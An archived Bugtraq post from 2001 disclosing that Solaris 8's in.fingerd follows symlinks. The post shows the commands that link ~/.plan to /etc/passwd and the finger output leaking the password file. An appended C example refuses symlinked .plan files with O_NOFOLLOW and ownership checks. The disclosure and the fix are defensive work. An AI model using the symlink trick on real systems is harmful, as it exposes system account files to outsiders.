Bugtraq mailing list archives
in.fingerd follows sym-links on Solaris 8
From: Lukasz Luzar <lluzar () developers of pl>
Date: Thu, 24 May 2001 18:14:59 +0200 (CEST)
Hello,

Solaris 8 is still vulnerable to the old bug in the in.fingerd daemon.

lluzar@sun:~ (101) > ln -s /etc/passwd .plan
lluzar@sun:~ (102) > finger -l lluzar () sun developers of pl
[localhost]
Login name: lluzar                      In real life: Lukasz Luzar
Directory: /home/lluzar                 Shell: /bin/tcsh
On since May 19 20:17:04 on pts/70 from unix.developers.of.pl
Mail last read Sat May 19 13:51:12 2001
Plan:
root:x:0:1:Super-User:/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
.
.

I believe it could be dangerous in some cases, but people from Sun say that they won't repair in.fingerd because:

"There may be legitimate reasons for finger to follow symlinks. If finger is considered a security issue, it can be disabled. (..)"

What do you think?

Cheers,
--
Lukasz Luzar http://Developers.of.PL/
Crede quod habes, et habes
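
The behaviour reported above comes from opening ~/.plan by name and following whatever it points to. As an added example (not part of the original post and not Sun's in.fingerd code), this is one way a daemon can refuse a symlinked .plan. It assumes a POSIX.1-2008 system whose open() supports O_NOFOLLOW; open_plan_nofollow() and demo() are hypothetical names, and the files under /tmp are constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns a read-only fd for `path`, or -1 if the name is a symlink, is not
 * a regular file, or is not owned by `owner` (hypothetical helper). */
int open_plan_nofollow(const char *path, uid_t owner)
{
    struct stat st;
    /* O_NOFOLLOW: open() fails if the final path component is a symlink.
     * O_NONBLOCK: do not hang if the name turns out to be a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;
    /* fstat() the descriptor already held, so the check cannot race a swap.
     * The owner test also rejects hard links to other users' files. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != owner) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed demo: bit 0 is set if a real .plan opens, bit 1 if a .plan
 * symlinked to /etc/passwd is refused. Returns 3 when both hold. */
int demo(void)
{
    char dir[] = "/tmp/planXXXXXX", real[64], sym[64];
    int fd, result = 0;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(real, sizeof real, "%s/real.plan", dir);
    snprintf(sym, sizeof sym, "%s/link.plan", dir);
    if ((fd = open(real, O_WRONLY | O_CREAT | O_EXCL, 0600)) < 0)
        return -1;
    close(fd);
    if (symlink("/etc/passwd", sym) != 0)
        return -1;
    if ((fd = open_plan_nofollow(real, geteuid())) >= 0) { result |= 1; close(fd); }
    if (open_plan_nofollow(sym, geteuid()) < 0) result |= 2;
    unlink(sym); unlink(real); rmdir(dir);
    return result;
}

int main(void) { int r = demo(); printf("demo() = %d\n", r); return r == 3 ? 0 : 1; }
```

Opening the file with the target user's own credentials instead of the daemon's is a complementary control, since it limits what any followed link could expose.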